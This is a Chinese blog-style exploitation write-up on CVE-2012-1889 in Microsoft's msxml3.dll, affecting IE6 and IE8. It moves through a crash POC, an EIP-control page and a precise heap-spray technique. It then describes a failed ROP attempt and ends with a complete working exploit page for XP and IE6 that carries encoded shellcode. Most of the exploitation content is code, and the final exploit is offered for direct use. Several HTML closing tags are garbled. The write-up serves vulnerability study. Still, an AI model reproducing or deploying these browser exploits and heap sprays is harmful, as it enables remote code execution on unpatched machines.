作者丨黑蛋

一、漏洞简述

暴雷漏洞编号为cve-2012-1889，在2012年曝光的一种微软的XML核心组件漏洞，该漏洞属于缓冲区溢出，根据栈溢出可以控制EIP的位置。该漏洞产生于msxml3.dll模块中，msxml3.dll是微软的一个SAX2 帮助程序类。主要用途包括：XSL 转换 (XSLT) 和 XML 路径语言 (XPath) 的完全实现、对 XML (SAX2) 实现的简单 API 的修改，包括与万维网联合会 (W3C) 标准和 OASIS 测试套件保持更高一致性。影响版本IE6和IE8。

二、漏洞环境

系统版本

Win7x86Sp1、XPSp3

三、漏洞分析

3.1、漏洞验证

首先看POC，代码如下：

<html>
<head>
    <title>www.vultop.comtitle>
head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>
    <script>
        document.getElementById("HD").object.definition(0);
    script>
body>
html>

双击POC，打开Windbg附加第二个IE，g起来，然后发现断在如下地方：

可以看到这里回溯的话可以发现ecx的值来自于栈中，这里对漏洞原理不再赘述。definition是作为属性使用，但是被当做方法传入参数的时候就触发了这个漏洞。

3.2、栈溢出控制EIP

<html>
<head>
    <title>www.vultop.comtitle>
head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>
    <script>
       var obj = document.getElementById('HD').object;
        var ImgPath = unescape("\u0C0C\u0C0C");
        while (ImgPath.length < 0x1000)
            ImgPath += ImgPath;
        ImgPath = "\\\\1234" + ImgPath;
        ImgPath = ImgPath.substr(0, 0x1000-10);
      
        var emtPic = document.createElement("img");
        emtPic.src = ImgPath;
        emtPic.nameProp;
          obj.definition(0);
    script>
body>
html>

这里把路径后面全部拷贝为0C0C0C0C，然后返回当前图片名，就可以载入路径。

在没有保护的情况下，通过堆喷射，nop+shellcode就可以成功利用。

3.3、精准喷射

由于DEP的存在，我们需要精准喷射。Windows使用内存分页机制管理内存，内存操作的最小单位为一个内存分页，一个内存分页4kb（0x1000）大小（64位系统中最大的内存分页为1G），则申请的一段堆空间中，这段堆空间首地址一定是0x1000的倍数，如果知道一个内存地址相对于其所在内存分页首地址的偏移，那么就可以构造一个内存分页大小的内存块，并在距离内存块首地址指定偏移的位置设置关键数据，然后以该内存块作为的最小单元进行堆喷，从而保证被内存堆喷射覆盖的指定内存地址处存在关键数据
首先我们选择堆喷射：

<html>
<head>
    <title>www.vultop.comtitle>
head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>
    <script>
     var shellcode = unescape('%u0c0c%u0c0c'+  
                        '%u4141%u4141'+
                        '%u4141%u4141'+
                        '%u4141%u4141'+
                        '%u4141%u4141'+
                        '%u4141%u4141'+
                        '%uaaaa%uaaaa'     
                        );
var var_C = unescape( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (var_C.length + 20 + 8 < 65536) var_C+=var_C;  //0x10000,64kb,减去28个shellcode长度
var_D = var_C.substring(0, (0x0c0c-0x24)/2);//0x24字节堆块信息
var_D += shellcode;  // 拼接shellcode
var_D += var_C;      // 拼接滑块代码
var_E = var_D.substring(0, 65536/2);
while(var_E.length < 0x80000) var_E += var_E;//一个块1MB
var_H = var_E.substring(0, 0x80000);
var var_F = new Array();
for (var_G=0;var_G<0x1f0;var_G++) var_F[var_G]=var_H;
   
          
          
       var obj = document.getElementById('HD').object;
        var ImgPath = unescape("\u0C0C\u0C0C");
        while (ImgPath.length < 0x1000)
            ImgPath += ImgPath;
        ImgPath = "\\\\1234" + ImgPath;
        ImgPath = ImgPath.substr(0, 0x1000-10);
      
        var emtPic = document.createElement("img");
        emtPic.src = ImgPath;
        emtPic.nameProp;
          obj.definition(0);
    script>
body>
html>

这里为了更好的观察，我用了x32dbg，，代码注释都在上面，放图，可以看到已经实现精准喷射，当然喷射有风险，随缘喷，多喷几次：

顺带看看内存分配情况：

3.4、构造ROP链（失败）

由于ASLR保护的存在，我们构造ROP链首先找到未开启ASLR保护的模块：

resource.dll和sogoupy.iem，用个der，俩个用不了。放弃了，这个漏洞就这么着吧

直接甩xp+IE6可以跑的EXP：

直接使用滑板指令+shellcode大面积喷射实现，没有任何保护。

<html>
<head>
    <title>www.vultop.comtitle>
head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>
    <script>
     var mPayload = unescape("\u0C0C\u0C0C");
     while(mPayload.length < 0x1000)
     mPayload += mPayload;
    var mSize=0x40000;
 var shellcode=unescape("\u68FC\u0A6A\u1E38\u6368\uD189\u684F\u7432"+
 "\u0C91\uF48B\u7E8D\u33F4\uB7DB\u2B04\u66E3\u33BB\u5332\u7568\u6573"+
 "\u5472\uD233\u8B64\u305A\u4B8B\u8B0C\u1C49\u098B\u698B\uAD08\u6A3D"+
 "\u380A\u751E\u9505\u57FF\u95F8\u8B60\u3C45\u4C8B\u7805\uCD03\u598B\u0320\u33DD\u47FF\u348B\u03BB\u99F5\uBE0F\u3A06"+
 "\u74C4\uC108\u07CA\uD003\uEB46\u3BF1\u2454\u751C\u8BE4\u2459\uDD03\u8B66\u7B3C\u598B\u031C\u03DD\uBB2C\u5F95\u57AB"+
 "\u3D61\u0A6A\u1E38\uA975\uDB33\u6853\u6577\u7473\u6668\u6961\u8B6C\u53C4\u5050\uFF53\uFC57\uFF53\uF857"); 
    mPayload+=shellcode;
    while(mPayload.length <= mSize)
    mPayload += mPayload;
    //mPayload = mPayload.substring(2,mSize-0x21);
    mPayload = mPayload.substring(0,mSize);
    //alert(mPayload.length.toString(16));
    var mArray= new Array();
    for (var i = 0; i < 800; i++)
{
 mArray[i] = mPayload.substr(0,mPayload.length);
}
   
          
          
       var obj = document.getElementById('HD').object;
        var ImgPath = unescape("\u0C0C\u0C0C");
        while (ImgPath.length < 0x1000)
            ImgPath += ImgPath;
        ImgPath = "\\\\1234" + ImgPath;
        ImgPath = ImgPath.substr(0, 0x1000-10);
      
        var emtPic = document.createElement("img");
        emtPic.src = ImgPath;
        emtPic.nameProp;
          obj.definition(0);
    script>
body>
html>